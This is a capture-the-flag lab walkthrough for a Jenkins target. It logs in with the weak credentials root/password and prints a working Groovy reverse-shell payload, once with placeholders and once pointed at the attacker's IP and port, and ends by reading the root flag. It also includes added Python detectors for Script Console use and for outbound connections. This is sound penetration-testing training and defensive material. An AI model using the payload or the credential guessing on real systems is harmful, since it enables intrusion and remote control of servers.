Contents
1. What does the acronym CVE stand for?
2. What do the three letters in CIA, referring to the CIA triad in cybersecurity, stand for?
3. What is the version of the service running on port 8080?
4. What version of Jenkins is running on the target?
5. What type of script is accepted as input on the Jenkins Script Console?
6. What would the "String cmd" variable from the Groovy Script snippet be equal to if the Target VM was running Windows?
7. What is a different command than "ip a" we could use to display our network interfaces' information on Linux?
8. What switch should we use with netcat for it to use UDP transport mode?
9. What is the term used to describe making a target host initiate a connection back to the attacker host?
ROOT_FLAG:9cdfb439c7876e703e307864c9167a15
Connect to the HTB server and start the target machine.
Target IP: 10.129.235.133
Assigned IP: 10.10.16.12
1. What does the acronym CVE stand for?
CVE stands for Common Vulnerabilities and Exposures.
CVE is a public naming standard for vulnerabilities. It assigns a single identifier to each known security vulnerability or exposure, so that security researchers, vendors and users can discuss and track the same issue unambiguously and improve their overall defensive posture.
2. What do the three letters in CIA, referring to the CIA triad in cybersecurity, stand for?
In cybersecurity, the CIA triad refers to: Confidentiality, Integrity, Availability.
Confidentiality ensures that information is accessed only by authorized users; integrity guarantees that information is not tampered with while stored or in transit; availability ensures that authorized users can reliably access information and resources whenever they need them.
3. What is the version of the service running on port 8080?
Use nmap to run the default scripts (-sC) and service/version detection (-sV) against port 8080 on the target:
```bash
nmap -sC -sV -p 8080 {TARGET_IP}
```
In the nmap output, the VERSION column shows the service as: Jetty 9.4.39.v20210325
4. What version of Jenkins is running on the target?
Open the target URL in a browser: http://{TARGET_IP}:8080
It redirects straight to a login page; a quick weak-password brute force yields the credentials:
Username: root
Password: password
After logging in to the dashboard, the Jenkins version is shown in the bottom-right corner of the page: 2.289.1
5. What type of script is accepted as input on the Jenkins Script Console?
Click Manage Jenkins in the left navigation bar.
Scroll down on the right-hand side and find Script Console.
Open it and read the description on the Script Console page:
> Type in an arbitrary Groovy script and execute it on the server. Useful for trouble-shooting and diagnostics. Use the 'println' command to see the output (if you use System.out, it will go to the server's stdout, which is harder to see.) Example:
```groovy
println(Jenkins.instance.pluginManager.plugins)
```
> All the classes from all the plugins are visible. jenkins.*, jenkins.model.*, hudson.*, and hudson.model.* are pre-imported.
From this description, the Jenkins Script Console accepts Groovy scripts as input, and runs them with full access to the server-side Jenkins object model.
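Because anything submitted to the Script Console runs on the Jenkins server with the JVM's privileges, a defender wants to know every time it is used. The script below is an added example for this writeup, not code from the original page or from the Jenkins project: it parses constructed NCSA-style access-log lines of the shape Jenkins' bundled Winstone/Jetty access logger produces, separates views of the console (GET) from accepted script submissions (POST to /script or /scriptText), and counts executions per user and source address. The log lines, the assumption that the remote-user field carries the Jenkins user name, and the IP addresses are all constructed for the example.

```python
import re
from collections import Counter
from dataclasses import dataclass

# Constructed sample access-log lines in NCSA common format, the shape Jenkins'
# bundled Winstone/Jetty access logger produces. Made-up entries, not real traffic.
# Assumption: the remote-user field carries the authenticated Jenkins user name.
SAMPLE_LOG = """\
10.10.16.12 - root [12/Mar/2024:10:15:01 +0000] "GET /manage HTTP/1.1" 200 51234
10.10.16.12 - root [12/Mar/2024:10:15:20 +0000] "GET /script HTTP/1.1" 200 8231
10.10.16.12 - root [12/Mar/2024:10:15:47 +0000] "POST /script HTTP/1.1" 200 8310
10.10.16.12 - root [12/Mar/2024:10:16:02 +0000] "POST /scriptText HTTP/1.1" 200 17
10.0.0.5 - - [12/Mar/2024:10:16:10 +0000] "GET /login HTTP/1.1" 200 4012
10.0.0.7 - alice [12/Mar/2024:10:17:00 +0000] "GET /job/build/1/console HTTP/1.1" 200 2201
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+$'
)

# /script is the Script Console page; /scriptText is the endpoint that runs the
# submitted Groovy and returns its output. Both accept POSTed scripts.
CONSOLE_SUFFIXES = ("/script", "/scriptText")


@dataclass
class ConsoleEvent:
    ts: str
    ip: str
    user: str
    method: str
    path: str
    executed: bool  # True when a script was actually submitted and accepted


def parse_line(line):
    """Parse one NCSA line into a dict, or return None for lines that do not match."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["path"] = rec["path"].split("?", 1)[0]  # drop any query string
    rec["status"] = int(rec["status"])
    return rec


def is_console_path(path):
    # endswith() keeps the check valid when Jenkins runs under a context path such as /jenkins
    return path.endswith(CONSOLE_SUFFIXES)


def find_console_events(log_text):
    """Return every access to the Script Console; a GET is a view, an accepted POST is an execution."""
    events = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or not is_console_path(rec["path"]):
            continue
        events.append(ConsoleEvent(
            ts=rec["ts"], ip=rec["ip"], user=rec["user"],
            method=rec["method"], path=rec["path"],
            executed=(rec["method"] == "POST" and rec["status"] < 400),
        ))
    return events


def executions_by_principal(events):
    """Count accepted script executions per (user, source IP) pair."""
    return Counter((e.user, e.ip) for e in events if e.executed)


if __name__ == "__main__":
    evs = find_console_events(SAMPLE_LOG)
    for e in evs:
        print(f"{e.ts} {e.user}@{e.ip} {e.method} {e.path} executed={e.executed}")
    print(executions_by_principal(evs))
```

On the sample data the script reports one console view and two executions, both by root from 10.10.16.12. In practice the useful follow-up is to compare that (user, IP) pair with the set of administrators who are expected to use the console at all; on a server where nobody should, every accepted POST is an alert.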
6. What would the "String cmd" variable from the Groovy Script snippet be equal to if the Target VM was running Windows?
Reverse shell scripts of every kind can be found at 棱角社区 (link attached):
```groovy
String host="{NATIVE_IP}";   // address of the listening host
int port={NATIVE_PORT};      // port the listener is waiting on
String cmd="/bin/bash";      // the shell the target will run
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s=new Socket(host,port);
InputStream pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();
OutputStream po=p.getOutputStream(),so=s.getOutputStream();
// relay bytes between the shell process and the socket until either side closes
while(!s.isClosed()){
    while(pi.available()>0)so.write(pi.read());
    while(pe.available()>0)so.write(pe.read());
    while(si.available()>0)po.write(si.read());
    so.flush();po.flush();Thread.sleep(50);
    try{p.exitValue();break;}catch (Exception e){}
};
p.destroy();s.close();
```
If the target is a Windows machine, the String cmd field has to be changed to: "cmd.exe"
7. What is a different command than "ip a" we could use to display our network interfaces' information on Linux?
This is a general-knowledge question: ifconfig; adding the **-a** flag lists all network interfaces, including ones that are down.
```bash
ifconfig -a
```
It shows that my tun0 interface IP is: 10.10.16.12
8. What switch should we use with netcat for it to use UDP transport mode?
Check netcat's option list:
```bash
nc -h
```
As shown there, the -u switch makes netcat use UDP transport mode.
9. What is the term used to describe making a target host initiate a connection back to the attacker host?
The port in the payload is your own choice, so my complete payload is:
```groovy
String host="10.10.16.12";
int port=1425;
String cmd="/bin/bash";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s=new Socket(host,port);
InputStream pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();
OutputStream po=p.getOutputStream(),so=s.getOutputStream();
while(!s.isClosed()){
    while(pi.available()>0)so.write(pi.read());
    while(pe.available()>0)so.write(pe.read());
    while(si.available()>0)po.write(si.read());
    so.flush();po.flush();Thread.sleep(50);
    try{p.exitValue();break;}catch (Exception e){}
};
p.destroy();s.close();
```
Start a listener with nc, then run the script in the Script Console to receive a reverse shell (the term for making the target host initiate the connection back to the attacker host):
Use script to spawn an interactive shell:
```bash
script /dev/null -c bash
```
Finally, flag.txt is found in the /root directory; it can also be read directly with:
```bash
cat /root/flag.txt
```
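Seen from the target, the defining feature of a reverse shell is that a server process opens a connection outward on its own. The script below is an added example, not part of the original writeup or of any tool it mentions: it parses constructed output in the layout `ss -tnp` prints on Linux and flags established connections that the process initiated itself (local port is not one of its listening ports) to a peer outside an allow-list. Because the Groovy payload above opens the socket from inside the Jenkins JVM, the connection belongs to the `java` process rather than to a shell, so the check keys on the socket owner rather than on a process name. The sample rows, the listening-port set and the allow-list are constructed assumptions; the addresses reuse those from the writeup.

```python
import re
from dataclasses import dataclass

# Constructed sample in the layout `ss -tnp` prints on Linux (state, queues,
# local and peer address:port, owning process). Made up for this example, not
# captured from a real host; the addresses reuse the ones from the writeup.
SAMPLE_SS = """\
State  Recv-Q Send-Q Local Address:Port    Peer Address:Port   Process
ESTAB  0      0      10.129.235.133:8080   10.10.16.12:51234   users:(("java",pid=1201,fd=140))
ESTAB  0      0      10.129.235.133:46822  10.10.16.12:1425    users:(("java",pid=1201,fd=152))
ESTAB  0      0      10.129.235.133:33104  10.129.0.20:443     users:(("java",pid=1201,fd=160))
ESTAB  0      0      127.0.0.1:8080        127.0.0.1:40110     users:(("java",pid=1201,fd=170))
"""

# Assumptions for this host: the Jenkins JVM only listens on 8080, and the only
# outbound destination it is expected to talk to is an internal server on 443.
LISTENING_PORTS = {8080}
ALLOWED_PEERS = {("10.129.0.20", 443)}

ROW_RE = re.compile(
    r"^(?P<state>[A-Z-]+)\s+\d+\s+\d+\s+(?P<local>\S+)\s+(?P<peer>\S+)"
    r"(?:\s+users:\(\(\"(?P<proc>[^\"]+)\",pid=(?P<pid>\d+),fd=\d+\)\))?"
)


@dataclass
class Conn:
    state: str
    local_ip: str
    local_port: int
    peer_ip: str
    peer_port: int
    proc: str
    pid: int


def split_addr(addr):
    """Split 'ip:port' into (ip, int port); rsplit keeps bracketed IPv6 addresses intact."""
    ip, port = addr.rsplit(":", 1)
    return ip, int(port)


def parse_ss(text):
    """Parse ss-style rows into Conn records, skipping the header and anything unparseable."""
    conns = []
    for line in text.splitlines():
        if not line or line.startswith("State"):
            continue
        m = ROW_RE.match(line)
        if not m:
            continue
        lip, lport = split_addr(m["local"])
        pip, pport = split_addr(m["peer"])
        conns.append(Conn(m["state"], lip, lport, pip, pport,
                          m["proc"] or "?", int(m["pid"] or 0)))
    return conns


def is_outbound(conn, listening_ports):
    # A connection the process accepted has one of its listening ports as the
    # local port; any other local port means the process dialed out itself.
    return conn.local_port not in listening_ports


def suspicious_outbound(conns, listening_ports=LISTENING_PORTS, allowed_peers=ALLOWED_PEERS):
    """Established, self-initiated connections to peers that are not on the allow-list."""
    return [c for c in conns
            if c.state == "ESTAB"
            and is_outbound(c, listening_ports)
            and (c.peer_ip, c.peer_port) not in allowed_peers]


if __name__ == "__main__":
    for c in suspicious_outbound(parse_ss(SAMPLE_SS)):
        print(f"{c.proc}[{c.pid}] {c.local_ip}:{c.local_port} -> {c.peer_ip}:{c.peer_port}")
```

On the sample rows only the connection from local port 46822 to 10.10.16.12:1425 is flagged: the two rows with local port 8080 are clients that connected to Jenkins, and the 443 connection is on the allow-list. The same logic works on live `ss -tnp` output piped into the parser; the allow-list is the part that has to be maintained per host.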